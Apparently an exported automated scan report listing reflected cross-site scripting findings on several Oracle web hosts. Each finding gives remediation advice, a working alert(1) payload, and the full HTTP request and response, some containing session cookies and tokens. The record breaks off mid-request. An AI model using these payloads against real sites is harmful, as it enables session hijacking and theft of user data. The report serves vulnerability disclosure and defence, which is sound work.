HTTP/1.1 200 OK379100"-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=21;ecid=49401561834281059,0:1)////////////////////////////////////////////////////...[SNIP]... .hasFeature;MENTATION_LEVEL2 = document.implementation && document.implementation.createDocument;XPATH _LEVEL3 = SSAjax.HAS_DOM_IMPLEMENTATION_LEVEL1 && document.implementation.hasFeature("XPath", "3.0");****************************************************...[SNIP]...
3. Cross-site scripting (reflected)
previous
next
There are 16 instances of this issue:
Issue background
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised. User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
3.1. https://campus.oracle.com/campus/HR/us-profile-direct.jsp [flag parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/us-profile-direct.jsp
Issue detail
The value of the flag request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4972f"%3balert(1)//fcb5f1357c2 was submitted in the flag parameter. This input was echoed as 4972f";alert(1)//fcb5f1357c2 in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /campus/HR/us-profile-direct.jsp?flag=04972f"%3balert(1)//fcb5f1357c2 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/us-profile_mobile.html;q=0.30d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server0d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus/html4/loose.dtd">...[SNIP]... 4972f";alert(1)//fcb5f1357c2 "=="1").value;.value;...[SNIP]...
3.2. https://campus.oracle.com/campus/HR/us-upload-file.jsp [flag parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/us-upload-file.jsp
Issue detail
The value of the flag request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45f62"%3balert(1)//dfdbea669a6 was submitted in the flag parameter. This input was echoed as 45f62";alert(1)//dfdbea669a6 in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /campus/HR/us-upload-file.jsp?flag=045f62"%3balert(1)//dfdbea669a6 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/us-profile_mobile.html;q=0.30d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server0d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus/html4/loose.dtd">...[SNIP]... 45f62";alert(1)//dfdbea669a6 "=="1");...[SNIP]...
3.3. https://cloud.oracle.com/mycloud/wwv_flow.accept [p_md5_checksum parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://cloud.oracle.com
Path:
/mycloud/wwv_flow.accept
Issue detail
The value of the p_md5_checksum request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7de15"><script>alert(1)</script>f63bfb69bab was submitted in the p_md5_checksum parameter. This input was echoed unmodified in the application's response.
Request
POST /mycloud/wwv_flow.accept HTTP/1.1-urlencoded/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/mycloud/f?p=service2:notify_me:0:::1::;q=0.3=3598503052462700; ORACLE_CLOUD=C883817E0FE44F56; WWV_PUBLIC_SESSION_5003=1479613243090993; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_cc=true; BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; s_nr=1318815714959; gpw_e24=https%3A%2F%2Fcloud.oracle.com%2Fmycloud%2Ff%3Fp%3Dservice2%3Anotify_me%3A0%3A%3A%3A1%3A%3A; s_sq=oraclecloud%3D%2526pid%253Dcloud%25253Aen-us%25253A%25252FNotify%252520Me%252520of%252520Updates%252520%25257C%252520Oracle%252520Public%252520Cloud%2526pidt%253D1%2526oid%253Djavascript%25253Aapex.submit('CREATE')%25253B%2526ot%253DA%26oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252Fproducts%25252Fapplications%25252Ffusion%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice%25253Ahome%25253A0%25253A%25253A%25253A%25253A%25253A%2526ot%253DA_step_id=1&p_instance=1479613243090993&p_page_submission_id=9442049033674&p_request=CREATE&p_arg_names=77163203970299379&p_t01=xss&p_arg_names=77163411158299380&p_t02=xss&p_arg_na...[SNIP]... &p_t04=xss&p_arg_names=77162817151299379&p_t05=US&p_arg_names=77163813569299380&p_arg_names=77161232145299376&p_t07=nqyy&p_arg_names=77161423188299376&p_t08=xs&p_md5_checksum=7de15"><script>alert(1)</script>f63bfb69bab
Response
HTTP/1.1 200 OK-11g_oracle_com_80=2463891081.24862.0000; expires=Mon, 17-Oct-2011 09:45:35 GMT; path=/...[SNIP]... 7de15"><script>alert(1)</script>f63bfb69bab " />...[SNIP]...
3.4. http://events.oracle.com/search/search [keyword parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://events.oracle.com
Path:
/search/search
Issue detail
The value of the keyword request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20445"-alert(1)-"da812faca7f was submitted in the keyword parameter. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search/search?group=Events&keyword=OPN+Only20445"-alert(1)-"da812faca7f HTTP/1.1
Response
HTTP/1.1 200 OK-11g Oracle-Web-Cache-11g/11.1.1.4.0 (M;max-age=900+0;age=1;ecid=992113526294652,0:1)...[SNIP]... +Only20445"-alert(1)-"da812faca7f ";...[SNIP]...
3.5. http://events.oracle.com/search/search [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://events.oracle.com
Path:
/search/search
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af082"-alert(1)-"d619d29c89f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search/search?group=Events&keyword=OPN+Only&af082"-alert(1)-"d619d29c89f =1 HTTP/1.1
Response
HTTP/1.1 200 OK-11g Oracle-Web-Cache-11g/11.1.1.4.0 (M;max-age=900+0;age=1;ecid=992358339461188,0:1)...[SNIP]... +Only&af082"-alert(1)-"d619d29c89f =1";[countIndex] = 'Date:"This Week":"...[SNIP]...
3.6. http://events.oracle.com/search/search [pageHitCount parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://events.oracle.com
Path:
/search/search
Issue detail
The value of the pageHitCount request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4469b"-alert(1)-"c2db3255890 was submitted in the pageHitCount parameter. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search/search?start=&pageHitCount=104469b"-alert(1)-"c2db3255890 &group=Events&keyword=Developer HTTP/1.1
Response
HTTP/1.1 200 OK-11g Oracle-Web-Cache-11g/11.1.1.4.0 (M;max-age=900+0;age=1;ecid=1363623902462247,0:1)...[SNIP]... 4469b"-alert(1)-"c2db3255890 &group=Events&keyword=Developer";...[SNIP]...
3.7. http://events.oracle.com/search/search [start parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://events.oracle.com
Path:
/search/search
Issue detail
The value of the start request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b58d4"-alert(1)-"2d3b993af9e was submitted in the start parameter. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search/search?start=b58d4"-alert(1)-"2d3b993af9e &pageHitCount=10&group=Events&keyword=Developer HTTP/1.1
Response
HTTP/1.1 200 OK-11g Oracle-Web-Cache-11g/11.1.1.4.0 (M;max-age=900+0;age=2;ecid=1363383384271099,0:1)...[SNIP]... b58d4"-alert(1)-"2d3b993af9e &pageHitCount=10&group=Events&keyword=Developer";...[SNIP]...
3.8. https://login.oracle.com/oam/server/sso/auth_cred_submit [request_id parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/oam/server/sso/auth_cred_submit
Issue detail
The value of the request_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd99f"><script>alert(1)</script>156227c12b7d46e5a was submitted in the request_id parameter. This input was echoed unmodified in the application's response.
Request
GET /oam/server/sso/auth_cred_submit?v=v1.4&request_id=1464845504205588723dd99f"><script>alert(1)</script>156227c12b7d46e5a &OAM_REQ=VERSION_4%7EKk%252fxScRUpoZ7Ai84IFFZnAZ9XxsM1Ii8iVy4UnLMUA09vIONA1373ptUbdDbWK1I3N9QNYGFUjCSDxp0GzHunzGq%252fvmBT1AU8oHT9wFSl9DhSVwOc2bfDcq7LD59f1pwdrf60S8Oivf7mVNr7alnL1Y3Sw50MgkaU7G2InSL%252feSMXvUldYK4Xq6LYEVxGcoV8Oj7hjvqjGj3hERxluTMK9hpnjmyb2Tk07YmocZNna4FxugOHB517XKtT%252fhaXTLMieDHBjvDwrGcViEAuwE3GGvqWHpuTojl5qy34QNEhdC2djIdXUMOOmAtwhL%252fnG5Hf4P8HHsu8xQRQXzqFuw84IXhviZOqiPdimSKrmZCieHw4KTU3U8bBdV2drUyWdG378btaVemyIYaZOdzeBbTvfwcaUzD9k05FpVqsOA1jZvM3qh5bvAxKZSjUDGkDttGtr1sIAaYM1rP2nqFHuuMqwqR3km%252frvNP6j1XKepoasyMK%252bl4o87mnMse%252fqKzFar57xv2Pu9GhinKV9eC9AqmY1EoqooHgPYBfdaJYtP%252b8vq8Q03DrhV2gF4OQ1Blwo7PeGZm6eT3qroQciufBCbFtk%252bK%252bryEpRISC%252fUxzlvibTvHxEwBzmYzGGjMajUTjIySuHKTuAjlXzmZwqCCG9kyOVJTFeDytRZonfbzYPfwQn1bCksfHikUBKxfeTpILYCfOPauIsDlLzU7igcS2C129VHXkTmStdbkw3svRNbymzA6g900o2UuOS2%252b3PvGBe8Vr70T0tGySawSF8nw7VDpEdA%252f4016lkQEFG0Kz2rqHLThxxny1YUHiojfF7e8%252bc29JoIcf5GGkBAVFby%252fRLMJkw%252fxBng0ZwigYYTBgkYryhaIACiR4p1cCGUOM9nnHqxf8IZsuZ8wXTZmTq0pvKW6RvGMpTILIrTUkAeqw5pB4Y%252bA9AbThuC2czrtDDIjdbpN46gH7DRUCiLsF6cKHg4e7W1%252b2HzQh3XzdVUM07DXzsVkW9nWT27KrAl3daALlzhEXfwlWFnVVSq1CuxSwykwAKv7xOeerBTFP1v9FJ5am%252bS%252bFCcwxOYl%252fLbVPnH8W4W208y9yReZfI9LukLQOVQBhI1NRh7TjG8uSqdHYO9j7qbMyUU2zmSjHQ3DVMJKp0Q0vkn6MxB0qJTuqIwTw0N8kdjrWSPuUN%252b5EG5V77IonzQyQYgDGA2vUMYGRFpxoZpnaHcMPlVQsF2Pr2k0d9hnkhbfeNmtBne181Z%252fw%252bSqqxgf2Tf%252bWYZeD2cvBgi6Yum0Rcw0pCx9p3NO7JFNyzF6w5VC2bFTE8itydCcFgGxAPkHa2wGZwYajF9frJxMVWiMqX776pdrbWY6brbU7xR4T%252blBgbEAJECkda7MDx3qXQ5pthDDovBGSs8homOrAI9drwCc%252fMai6Iu%252bc0oupb1SrHu5ehssn8fb2hx85XWS7KjtQx%252flgK%252f4cJ5iwfUv%252foGbRf%252b51Cgu%252bcU%252fZo9FInI1cAlxJzSfic7vuexGzPMC0EJkxGU2I6FLYAGWQRHcs93nxDVoJuSWjVcxgqI07XzAyVP7kWOLQqY2CJ8wNRzEcLNpOwrk86njQd9uDpThjxgZAZPs7PEWaz4MdaRkI2TlKV59hVNx%252fKc%252f%252fwuhOr2S6hWRclY72NSbCsIuYhc1KsnbwSvrBm1ltsBVC5ts20PiPkNA9ThQgIrbnvayfI3TdHvsWeo8tSv03Gbmd%252bhkbWmJrG1fQcYOrNdvIaNp10KtPz5Qx0jByU%252fET8RdVEcMwt8%253d&site2pstoretoken=v1.2%7EF5A2A848%7EFB22261949B0A2AE047092711E2A4E909D2DFEFC980F5290E48C0DE280576CB3BFB570115B2C0482F8CA88B112822F977BEB18CDB1B65E2748F527C79B791081928AE624D358C294FCC1F4F25E2AA010784959BF568194859B48BE4209B5A5078679DCD9FF6D0D335464BFADF215BB6DE9CFFE08D99416F668574BB14AB7CF1CCBA74B50518E1EB936622EC0F7B3C8C74C33BC41A91B969C50AFDFD9BDF985AA0567D6BCF6DB4AD2DD2B3352DEA8AC8804AF4F669091C9C0EDCCB1813C341AB7F8F88251C1EE697D28D1FE75CE015F59690BBA990B6F5F7B10EEFD565876FEFEF9302C83C8880A4C2C5522C46636A927F7E2C6C7F3DF9D9F474A3E24D1D09AE5&locale=&ssousername=xss&password=xss HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/mysso/signon.jsp;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_sq=%5B%5BB%5D%5D; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904888%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904890%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520your%25252520shopping%25252520cart%252526pidt%25253D1%252526oid%25253Djavascript%2525253Aapex.submit%25252528%25252527CHECKOUT%25252527%25252529%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000
Response
HTTP/1.1 200 OKUS1EaweP001pXu_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:48:46 GMT; path=/.submit()"><noscript><p>JavaScript is required. Enable JavaScript to use OAM Server.</p></noscript><form action="https://login.oracle.com/mysso/signon.jsp" method="p...[SNIP]... 588723dd99f"><script>alert(1)</script>156227c12b7d46e5a ">...[SNIP]...
3.9. https://oraclestore.oracle.com/OA_HTML/ibeCZzpHome.jsp [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://oraclestore.oracle.com
Path:
/OA_HTML/ibeCZzpHome.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 5f53e%20style%3dx%3aexpression(alert(1))%2045b8a85c5c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5f53e style=x:expression(alert(1)) 45b8a85c5c6 in the application's response.
Request
GET /OA_HTML/ibeCZzpHome.jsp?5f53e%20style%3dx%3aexpression(alert(1))%2045b8a85c5c6 =1 HTTP/1.1
Response (redirected)
HTTP/1.1 200 OKm9WKdGwsu9; domain=.oracle.com; path=/2BB23783F3DB5DA50E8D51B3415A9AB063C5CE811A9EE7E58F0901A440CFA22669C7189C4DE34B781F50877; expires=Fri, 16-Dec-2011 02:34:26 GMT; path=/OA_HTML_http=1510838925.5150.0000; path=/...[SNIP]... ?language=KO&ref=http://oraclestore.oracle.com/OA_HTML/ibeCZzpHome.jsp?5f53e style=x:expression(alert(1)) 45b8a85c5c6 =1>...[SNIP]...
3.10. http://solutions.oracle.com/portal/pls/portal/PORTAL.wwsbr_javascript.page_js [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://solutions.oracle.com
Path:
/portal/pls/portal/PORTAL.wwsbr_javascript.page_js
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload eb7eb<img%20src%3da%20onerror%3dalert(1)>016ce9558a8 was submitted in the REST URL parameter 3. This input was echoed as eb7eb<img src=a onerror=alert(1)>016ce9558a8 in the application's response.
Request
GET /portal/pls/portaleb7eb<img%20src%3da%20onerror%3dalert(1)>016ce9558a8 /PORTAL.wwsbr_javascript.page_js?p_language=us&p_version=10.1.4.1.0.113 HTTP/1.1.com/home/basic_search;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904888%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904890%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520your%25252520shopping%25252520cart%252526pidt%25253D1%252526oid%25253Djavascript%2525253Aapex.submit%25252528%25252527CHECKOUT%25252527%25252529%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; gpv_p24=no%20value; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; portal=9.0.3+en-us+us+AMERICA+AF7E580109CB55C9E040578C51E13693+71B76364A799F1AE086BA84B020F2F3EBEEA355AC1C17754D73BC16CF6BBABBBEE0A9FA755DEF0C1E3A96613591765978399FACD6BDB5ECC45AE34718F31EDF6BA33CF3842A305D5B404D9685E436F73EEF25F27CBC8D9EF; BIGipServersolcat_pool=1292735117.25118.0000
Response
HTTP/1.1 404 Not Found-10g OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=109260035617,0)ervlet/portaleb7eb%3Cimg%20src%3Da%20onerror%3Dalert(1)%3E016ce9558a8/PORTAL.wwsbr_javascript.page_js><H1>404 Not Found</H1>DAD "portaleb7eb<img src=a onerror=alert(1)>016ce9558a8 " not found in URL (http://solutions.oracle.com/portal/pls/portaleb7eb<img%20src%3da%20onerror%3dalert(1)>...[SNIP]...
3.11. http://solutions.oracle.com/portal/pls/portal/PORTAL.wwui_api_body.render_wizard_css [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://solutions.oracle.com
Path:
/portal/pls/portal/PORTAL.wwui_api_body.render_wizard_css
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 61cec<img%20src%3da%20onerror%3dalert(1)>2d0367c2b49 was submitted in the REST URL parameter 3. This input was echoed as 61cec<img src=a onerror=alert(1)>2d0367c2b49 in the application's response.
Request
GET /portal/pls/portal61cec<img%20src%3da%20onerror%3dalert(1)>2d0367c2b49 /PORTAL.wwui_api_body.render_wizard_css?p_bg_color=FFFFFF&p_is_bidi=0&p_version=10.1.4.1.0.113 HTTP/1.1.com/portal/pls/portal/PORTAL.wwv_basedm.show_translations?p_masterthingid=7668639&p_item_siteid=53&p_pageid=7668625&p_page_siteid=53&p_back_url=http%3A%2F%2Fsolutions.oracle.com%2Fsolutions%2Fbmg%2Fconsulting;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904888%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904890%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520your%25252520shopping%25252520cart%252526pidt%25253D1%252526oid%25253Djavascript%2525253Aapex.submit%25252528%25252527CHECKOUT%25252527%25252529%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; portal=9.0.3+en-us+us+AMERICA+AF7E580109CB55C9E040578C51E13693+71B76364A799F1AE086BA84B020F2F3EBEEA355AC1C17754D73BC16CF6BBABBBEE0A9FA755DEF0C1E3A96613591765978399FACD6BDB5ECC45AE34718F31EDF6BA33CF3842A305D5B404D9685E436F73EEF25F27CBC8D9EF; BIGipServersolcat_pool=1292735117.25118.0000; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 404 Not Found-10g OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=126440607374,1)ervlet/portal61cec%3Cimg%20src%3Da%20onerror%3Dalert(1)%3E2d0367c2b49/PORTAL.wwui_api_body.render_wizard_css><H1>404 Not Found</H1>DAD "portal61cec<img src=a onerror=alert(1)>2d0367c2b49 " not found in URL (http://solutions.oracle.com/portal/pls/portal61cec<img%20src%3da%20onerror%3dalert(1)>...[SNIP]...
3.12. http://solutions.oracle.com/portal/pls/portal/PORTAL.wwv_basedm.show_translations [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://solutions.oracle.com
Path:
/portal/pls/portal/PORTAL.wwv_basedm.show_translations
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1b200<img%20src%3da%20onerror%3dalert(1)>968676e5d39 was submitted in the REST URL parameter 3. This input was echoed as 1b200<img src=a onerror=alert(1)>968676e5d39 in the application's response.
Request
GET /portal/pls/portal1b200<img%20src%3da%20onerror%3dalert(1)>968676e5d39 /PORTAL.wwv_basedm.show_translations?p_masterthingid=7668639&p_item_siteid=53&p_pageid=7668625&p_page_siteid=53&p_back_url=http%3A%2F%2Fsolutions.oracle.com%2Fsolutions%2Fbmg%2Fconsulting HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8.com/solutions/bmg/consulting;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904888%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904890%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520your%25252520shopping%25252520cart%252526pidt%25253D1%252526oid%25253Djavascript%2525253Aapex.submit%25252528%25252527CHECKOUT%25252527%25252529%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; portal=9.0.3+en-us+us+AMERICA+AF7E580109CB55C9E040578C51E13693+71B76364A799F1AE086BA84B020F2F3EBEEA355AC1C17754D73BC16CF6BBABBBEE0A9FA755DEF0C1E3A96613591765978399FACD6BDB5ECC45AE34718F31EDF6BA33CF3842A305D5B404D9685E436F73EEF25F27CBC8D9EF; BIGipServersolcat_pool=1292735117.25118.0000; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 404 Not Found-10g OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=87786108576,1)ervlet/portal1b200%3Cimg%20src%3Da%20onerror%3Dalert(1)%3E968676e5d39/PORTAL.wwv_basedm.show_translations><H1>404 Not Found</H1>DAD "portal1b200<img src=a onerror=alert(1)>968676e5d39 " not found in URL (http://solutions.oracle.com/portal/pls/portal1b200<img%20src%3da%20onerror%3dalert(1)>...[SNIP]...
3.13. http://solutions.oracle.com/portal/pls/portal/PORTAL.wwv_javascript.fetch_script [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://solutions.oracle.com
Path:
/portal/pls/portal/PORTAL.wwv_javascript.fetch_script
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 32e1e<img%20src%3da%20onerror%3dalert(1)>7b624fc905f was submitted in the REST URL parameter 3. This input was echoed as 32e1e<img src=a onerror=alert(1)>7b624fc905f in the application's response.
Request
GET /portal/pls/portal32e1e<img%20src%3da%20onerror%3dalert(1)>7b624fc905f /PORTAL.wwv_javascript.fetch_script?p_name=search_form&p_dynamic=y&p_language=us HTTP/1.1.com/home/basic_search;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904888%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904890%3B; 